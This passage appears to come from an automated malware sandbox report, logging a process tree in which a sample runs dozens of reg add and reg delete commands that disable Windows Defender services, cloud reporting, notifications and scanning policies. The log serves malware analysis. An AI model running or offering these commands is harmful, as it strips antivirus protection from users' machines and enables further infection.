    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v DisableUpdateOnStartupWithoutEngine /t REG_DWORD /d 1 /f
    3⤵
    PID:9492
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleDay /t REG_DWORD /d 8 /f"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:8836
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleDay /t REG_DWORD /d 8 /f
    3⤵
    PID:10936
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleTime /t REG_DWORD /d 0 /f"
  2⤵
  PID:8976
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleTime /t REG_DWORD /d 0 /f
    3⤵
    PID:10184
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v SignatureUpdateCatchupInterval /t REG_DWORD /d 0 /f"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:8276
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v SignatureUpdateCatchupInterval /t REG_DWORD /d 0 /f
    3⤵
    PID:11136
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v DisableBlockAtFirstSeen /t REG_DWORD /d 1 /f"
  2⤵
  PID:7516
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v DisableBlockAtFirstSeen /t REG_DWORD /d 1 /f
    3⤵
    PID:11004
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v LocalSettingOverrideSpynetReporting /t REG_DWORD /d 0 /f"
  2⤵
  PID:1016
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3856
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v LocalSettingOverrideSpynetReporting /t REG_DWORD /d 0 /f
    3⤵
    PID:9724
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /t REG_DWORD /d 0 /f"
  2⤵
  PID:6204
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /t REG_DWORD /d 0 /f
    3⤵
    PID:9828
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReportingLocation /t REG_MULTI_SZ /d 0 /f"
  2⤵
  PID:2256
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReportingLocation /t REG_MULTI_SZ /d 0 /f
    3⤵
    PID:10984
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f"
  2⤵
  PID:2192
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f
    3⤵
    PID:9688
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\Sense /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:6024
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\Sense /v Start /t REG_DWORD /d 4 /f
    3⤵
    - Modifies registry key
    PID:9780
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WinDefend /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:6904
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WinDefend /v Start /t REG_DWORD /d 4 /f
    3⤵
    - Modifies registry key
    PID:9836
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\MsSecFlt /v Start /t REG_DWORD /d 4 /f"
  2⤵
  PID:5868
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\MsSecFlt /v Start /t REG_DWORD /d 4 /f"
    3⤵
    PID:5268
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:4324
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService /v Start /t REG_DWORD /d 4 /f
    3⤵
    - Modifies Security services
    PID:7520
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdBoot /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:4228
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WdBoot /v Start /t REG_DWORD /d 4 /f
    3⤵
    - Modifies Security services
    - Modifies registry key
    PID:9928
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdFilter /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:8484
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WdFilter /v Start /t REG_DWORD /d 4 /f
    3⤵
    PID:10720
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdNisDrv /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:7376
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WdNisDrv /v Start /t REG_DWORD /d 4 /f
    3⤵
    - Modifies registry key
    PID:10976
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdNisSvc /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:5740
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WdNisSvc /v Start /t REG_DWORD /d 4 /f
    3⤵
    PID:9920
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderApiLogger /v Start /t REG_DWORD /d 0 /f
  2⤵
  PID:6960
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderApiLogger /v Start /t REG_DWORD /d 0 /f
    3⤵
    PID:8172
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderAuditLogger /v Start /t REG_DWORD /d 0 /f
  2⤵
  PID:1836
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderAuditLogger /v Start /t REG_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:9728
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v SecurityHealth /t REG_BINARY /d 03,00,00,00,00,00,00,00,00,00,00,00 /f
  2⤵
  - An obfuscated cmd.exe command-line is typically used to evade detection.
  PID:6792
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v SecurityHealth /t REG_BINARY /d 03,00,00,00,00,00,00,00,00,00,00,00 /f
    3⤵
    - Modifies registry key
    PID:10992
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v SecurityHealt /f
  2⤵
  PID:4860
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v SecurityHealt /f
    3⤵
    - Modifies registry key
    PID:9720
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Security Health\State" /v AccountProtection_MicrosoftAccount_Disconnected /f"
  2⤵
  PID:8012
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows Security Health\State" /v AccountProtection_MicrosoftAccount_Disconnected /f
    3⤵
    PID:10044
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableNotifications /f"
  2⤵
  PID:4956
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:8280
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableNotifications /f
    3⤵
    PID:9616
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableEnhancedNotifications /f"
  2⤵
  PID:5728
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableEnhancedNotifications /f
    3⤵
    PID:3256
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /f"
  2⤵
  PID:5388
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /f
    3⤵
    PID:9984
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiVirus /f"
  2⤵
  PID:7976
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiVirus /f
    3⤵
    PID:9672
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v FirstAuGracePeriod /f"
  2⤵
  PID:8784
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v FirstAuGracePeriod /f
    3⤵
    PID:11224
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v DisablePrivacyMode /f"
  2⤵
  PID:7844
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v DisablePrivacyMode /f
    3⤵
    PID:9676
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontOfferThroughWUAU /f
  2⤵
  PID:8560
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontOfferThroughWUAU /f
    3⤵
    PID:5512
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontReportInfectionInformation /f
  2⤵
  PID:9172
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontReportInfectionInformation /f
    3⤵
    PID:10736
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /f"
  2⤵
  PID:8148
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /f
    3⤵
    PID:10116
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /f"
  2⤵
  PID:2596
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /f
    3⤵
    PID:9992
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /f"
  2⤵
  PID:6716
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /f
    3⤵
    PID:9844
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v RandomizeScheduleTaskTimes /f"
  2⤵
  PID:8108
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6468
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v RandomizeScheduleTaskTimes /f
    3⤵
    PID:10232
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v DisableAutoExclusions /f"
  2⤵
  PID:7528
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v DisableAutoExclusions /f
    3⤵
    PID:9820
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v MpEnablePus /f"
  2⤵
  PID:3220
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v MpEnablePus /f
    3⤵
    PID:7700
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v LocalSettingOverridePurgeItemsAfterDelay /f"
  2⤵
  PID:4516
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v LocalSettingOverridePurgeItemsAfterDelay /f
    3⤵
    PID:9952
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v PurgeItemsAfterDelay /f"
  2⤵
  PID:7532
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v PurgeItemsAfterDelay /f
    3⤵
    PID:9964
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /f"
  2⤵
  PID:4220
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /f
    3⤵
    PID:10788
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIOAVProtection /f"
  2⤵
  PID:940
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIOAVProtection /f
    3⤵
    PID:9740
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /f"
  2⤵
  PID:7668
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /f
    3⤵
    PID:9704
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /f"
  2⤵
  PID:8864
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6940
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /f
    3⤵
    PID:10704
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRoutinelyTakingAction /f"
  2⤵
  PID:5216
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRoutinelyTakingAction /f
    3⤵
    PID:9936
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /f"
  2⤵
  PID:2452
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /f
    3⤵
    PID:10948
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScriptScanning /f"
  2⤵
  PID:6544
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6124
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScriptScanning /f
    3⤵
    PID:11160
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleDay /f"
  2⤵
  PID:6672
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleDay /f
    3⤵
    PID:10728
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleTime /f"
  2⤵
  PID:8088
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleTime /f
    3⤵
    PID:10916
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v AdditionalActionTimeOut /f"
  2⤵
  PID:4864
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6840
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v AdditionalActionTimeOut /f
    3⤵
    PID:11076
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v CriticalFailureTimeOut /f"
  2⤵
  PID:8780
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v CriticalFailureTimeOut /f
    3⤵
    PID:9712
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableEnhancedNotifications /f"
  2⤵
  PID:6188
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableEnhancedNotifications /f
    3⤵
    PID:3080
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableGenericRePorts /f"
  2⤵
  PID:6916
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableGenericRePorts /f
    3⤵
    PID:9596
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v NonCriticalTimeOut /f"
  2⤵
  PID:5272
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:7512
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v NonCriticalTimeOut /f
    3⤵
    PID:11048
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v AvgCPULoadFactor /f"
  2⤵
  PID:8440
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v AvgCPULoadFactor /f
    3⤵
    PID:10768
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableArchiveScanning /f"
  2⤵
  PID:5340
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableArchiveScanning /f
    3⤵
    PID:10896
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupFullScan /f"
  2⤵
  PID:4036
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupFullScan /f
    3⤵
    PID:11144
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupQuickScan /f"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:6208
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupQuickScan /f
    3⤵
    PID:8244
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRemovableDriveScanning /f"
  2⤵
  PID:7576
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRemovableDriveScanning /f
    3⤵
    PID:9976
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRestorePoint /f"
  2⤵
  PID:5796
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRestorePoint /f
    3⤵
    PID:9860
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningMappedNetworkDrivesForFullScan /f"
  2⤵
  PID:7068
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningMappedNetworkDrivesForFullScan /f
    3⤵
    PID:11244
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningNetworkFiles /f"
  2⤵
  PID:1632
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningNetworkFiles /f
    3⤵
    PID:9808
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v PurgeItemsAfterDelay /f"
  2⤵
  PID:6768
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v PurgeItemsAfterDelay /f
    3⤵
    PID:10524
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanOnlyIfIdle /f"
  2⤵
  PID:4276
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanOnlyIfIdle /f
    3⤵
    PID:11040
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanParameters /f"
  2⤵
  PID:6380
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanParameters /f
    3⤵
    PID:11152
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleDay /f"
  2⤵
  PID:6884
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleDay /f
    3⤵
    PID:11176
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleTime /f"
  2⤵
  PID:8124
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleTime /f
    3⤵
    PID:11024
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v DisableUpdateOnStartupWithoutEngine /f"
  2⤵
  PID:5144
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v DisableUpdateOnStartupWithoutEngine /f
    3⤵
    PID:9792
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleDay /f"
  2⤵
  PID:6732
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleDay /f
    3⤵
    PID:10688
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleTime /f"
  2⤵
  PID:6660
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleTime /f
    3⤵
    PID:11216
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v SignatureUpdateCatchupInterval /f"
  2⤵
  PID:4716
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v SignatureUpdateCatchupInterval /f
    3⤵
    PID:10928
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v DisableBlockAtFirstSeen /f"
  2⤵
  PID:2440
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v DisableBlockAtFirstSeen /f
    3⤵
    PID:9876
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v LocalSettingOverrideSpynetReporting /f"
  2⤵
  PID:2772
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v LocalSettingOverrideSpynetReporting /f
    3⤵
    PID:9664
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /f"
  2⤵
  PID:8844
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /f
    3⤵
    PID:9856
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReportingLocation /f"
  2⤵
  PID:5956
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReportingLocation /f
    3⤵
    PID:10884
- C:\Windows\SysWOW64\cmd.exe
